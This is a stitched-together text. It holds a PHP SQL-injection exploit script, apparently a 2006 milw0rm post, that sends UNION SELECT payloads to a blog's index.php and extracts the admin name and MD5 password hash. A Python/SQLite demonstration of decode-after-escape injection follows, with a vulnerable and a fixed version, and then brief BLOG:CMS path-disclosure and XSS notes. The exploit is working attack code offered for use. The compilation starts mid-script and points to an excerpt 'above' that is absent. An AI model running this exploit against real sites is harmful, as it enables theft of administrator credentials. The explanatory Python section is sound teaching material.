ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

// hex/ascii dump helper (kept from the original, only used for debugging)
function quick_dump($string) {
    $result='';$exa='';$cont=0;
    for ($i=0; $i<=strlen($string)-1; $i++) {
        if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) {$result.=" .";}
        else {$result.=" ".$string[$i];}
        if (strlen(dechex(ord($string[$i])))==2) {$exa.=" ".dechex(ord($string[$i]));}
        else {$exa.=" 0".dechex(ord($string[$i]));}
        $cont++;
        if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
    }
    return $exa."\r\n".$result;
}

$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';

// sends a raw HTTP packet (directly or through an ip:port proxy) and leaves the reply in $html
function sendpacketii($packet) {
    global $proxy, $host, $port, $html, $proxy_regex;
    if ($proxy=='') {
        $ock=fsockopen(gethostbyname($host),$port);
        if (!$ock) { echo 'No response from '.$host.':'.$port; die; }
    } else {
        $c = preg_match($proxy_regex,$proxy);
        if (!$c) { echo 'Not a valid proxy...'; die; }
        $parts=explode(':',$proxy);
        echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
        $ock=fsockopen($parts[0],$parts[1]);
        if (!$ock) { echo 'No response from proxy...'; die; }
    }
    fputs($ock,$packet);
    if ($proxy=='') {
        $html='';
        while (!feof($ock)) { $html.=fgets($ock); }
    } else {
        $html='';
        // read byte by byte until the end of the headers (\r\n\r\n) has been seen; the original used eregi(), removed in PHP 7
        while ((!feof($ock)) or (strpos($html,"\r\n\r\n")===false)) { $html.=fread($ock,1); }
    }
    fclose($ock);
    #debug
    #echo "\r\n".$html;
}

// ereg() in the original; preg_match() is the PHP 7+ equivalent
function is_hash($hash) {
    if (preg_match("/^[a-f0-9]{32}/",trim($hash))) {return true;} else {return false;}
}

$host=$argv[1];
$path=$argv[2];
$port=80;
$prefix="lb_";
$proxy="";
for ($i=3; $i<=$argc-1; $i++){
    $temp=$argv[$i][0].$argv[$i][1];
    if ($temp=="-p") { $port=str_replace("-p","",$argv[$i]); }
    if ($temp=="-P") { $proxy=str_replace("-P","",$argv[$i]); }
    if ($temp=="-T") { $prefix=str_replace("-T","",$argv[$i]); }
}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

// the UNION needs the right column count; try the tested one first, then the nearby guesses
$zeros=array(",0,0,0,0", //<- this the one I tested, may change in other versions
             ",0,0,0",
             ",0,0",
             ",0",
             ",0,0,0,0,0",
             ",0,0,0,0,0,0",
             ",0,0,0,0,0,0,0");
for ($i=0; $i<count($zeros); $i++) {
    // nickname and password are wrapped in markers so they can be cut out of the page afterwards
    $sql="'UNION/**/SELECT/**/0,0,CONCAT('*_u_*',nickname,'*_u_*'),'2005-03-29 16:32:42',0,0,0,0,0,0,CONCAT('*_p_*',password,'*_p_*'),0,0,0,0,0,0,0".$zeros[$i]."/**/FROM/**/".$prefix."authors/**/WHERE/**/id=1/*";
    //debug
    //echo "sql -> ".$sql."\r\n";
    $sql=urlencode($sql);
    $packet ="GET ".$p."index.php?id=$sql HTTP/1.0\r\n";
    $packet.="Host: ".$host."\r\n";
    $packet.="Connection: Close\r\n\r\n";
    sendpacketii($packet);
    $temp=explode("*_p_*",$html);
    $hash=$temp[1];
    if (is_hash($hash)) {
        echo "-------------------------------------------------------\r\n";
        echo "password (md5) -> ".$hash."\r\n";
        $temp=explode("*_u_*",$html);
        echo "admin -> ".$temp[1]."\r\n";
        echo "-------------------------------------------------------\r\n";
        die;
    }
}
//if you are here...
echo "exploit failed...";
?>
# milw0rm.com [2006-07-21]
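The MyBloggie trackback.php excerpt above (and rgod's note that urldecode() runs after magic_quotes_gpc, so %2527 becomes a quote) is a general pattern: any escaping step that runs before a decoding step is void. The block below is an added example, not code from MyBloggie, rgod or this post. It models the bug with Python's sqlite3 module: a magic_quotes-style escape, then an application-level urldecode, then string-built SQL, next to the hardened form (decode once, bind parameters). Table and column names (mb_user, mb_comment, comment_subject, comments) follow the page; the admin row, the hash and the excerpt value are constructed test data, and the payload is rgod's idea rewritten for SQLite syntax (VALUES list plus a trailing comment instead of MySQL's INSERT ... SET and /*).

```python
"""Decode-after-escape SQL injection (the MyBloggie trackback.php pattern), simulated on SQLite.

Added example, not the project's code. Assumptions: the escaping layer doubles single quotes
(SQLite style; addslashes() backslash-escapes them in MySQL, the ordering bug is identical),
and the request body is URL-decoded once by the web server before the application sees it.
"""
from __future__ import annotations

import sqlite3
from urllib.parse import unquote


def escape_quotes(value: str) -> str:
    """Stand-in for magic_quotes_gpc: neutralise single quotes before they reach SQL."""
    return value.replace("'", "''")


def fresh_db() -> sqlite3.Connection:
    """Minimal schema with one constructed admin row (hash is md5('password'))."""
    db = sqlite3.connect(":memory:")
    db.executescript(
        """
        CREATE TABLE mb_user (user TEXT, password TEXT);
        INSERT INTO mb_user VALUES ('admin', '5f4dcc3b5aa765d61d8327deb882cf99');
        CREATE TABLE mb_comment (post_id INTEGER, comment_subject TEXT, comments TEXT);
        """
    )
    return db


def vulnerable_trackback(db: sqlite3.Connection, post_id: int, wire_title: str, wire_excerpt: str) -> None:
    """What trackback.php does: server decodes the body once, magic_quotes escapes,
    then the application calls urldecode() again and interpolates into the INSERT."""
    title = unquote(escape_quotes(unquote(wire_title)))      # escape, THEN decode: %27 -> '
    excerpt = unquote(escape_quotes(unquote(wire_excerpt)))
    sql = (f"INSERT INTO mb_comment (post_id, comment_subject, comments) "
           f"VALUES ({post_id}, '{title}', '{excerpt}')")
    db.execute(sql)


def fixed_trackback(db: sqlite3.Connection, post_id: int, wire_title: str, wire_excerpt: str) -> None:
    """Hardened form: the transport decode happens once, no second urldecode(),
    and the values are bound as parameters instead of spliced into the statement."""
    title = unquote(wire_title)
    excerpt = unquote(wire_excerpt)
    db.execute("INSERT INTO mb_comment (post_id, comment_subject, comments) VALUES (?, ?, ?)",
               (post_id, title, excerpt))


def comments_for(db: sqlite3.Connection, post_id: int) -> list[tuple[str, str]]:
    """Everything a reader of the post would see, i.e. what the exploit scrapes from index.php."""
    return db.execute("SELECT comment_subject, comments FROM mb_comment WHERE post_id = ?",
                      (post_id,)).fetchall()


# rgod's trick in SQLite syntax: %2527 survives the escaping step as %27 and only becomes
# a quote afterwards; the subquery fills the 'comments' column; -- drops the rest of the statement
PAYLOAD_TITLE = "hi%2527,(SELECT password FROM mb_user))--"


def run_demo() -> tuple[list[tuple[str, str]], list[tuple[str, str]]]:
    """Returns (comments stored by the vulnerable code, comments stored by the fixed code)."""
    vuln = fresh_db()
    vulnerable_trackback(vuln, 1, PAYLOAD_TITLE, "whatever")
    safe = fresh_db()
    fixed_trackback(safe, 1, PAYLOAD_TITLE, "whatever")
    return comments_for(vuln, 1), comments_for(safe, 1)


if __name__ == "__main__":
    leaked, stored = run_demo()
    print("vulnerable:", leaked)   # the admin hash is now a comment body
    print("fixed:     ", stored)   # the payload is stored as plain text
```

The point the ordering makes: escape_quotes() sees `%27`, which contains nothing to escape, and the later unquote() produces the quote the escaping layer was meant to prevent. Moving the decode in front of the escape would close this one path, but only parameter binding removes the class of bug.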
BLOG:CMS 4.2.1

BLOG:CMS v4.2.1 Path Disclosure
Vulnerable code:
PHP:
$this->formdata = array(
    'id' => $blog?$blog->getID():$CONF['DefaultBlog'],
    'query' => htmlspecialchars(getVar('query')),
);

Vulnerable code:
PHP:
$_REQUEST = array_map("htmlentities", $_REQUEST);

Stored (persistent) XSS
The vulnerability is in the comments on blog entries.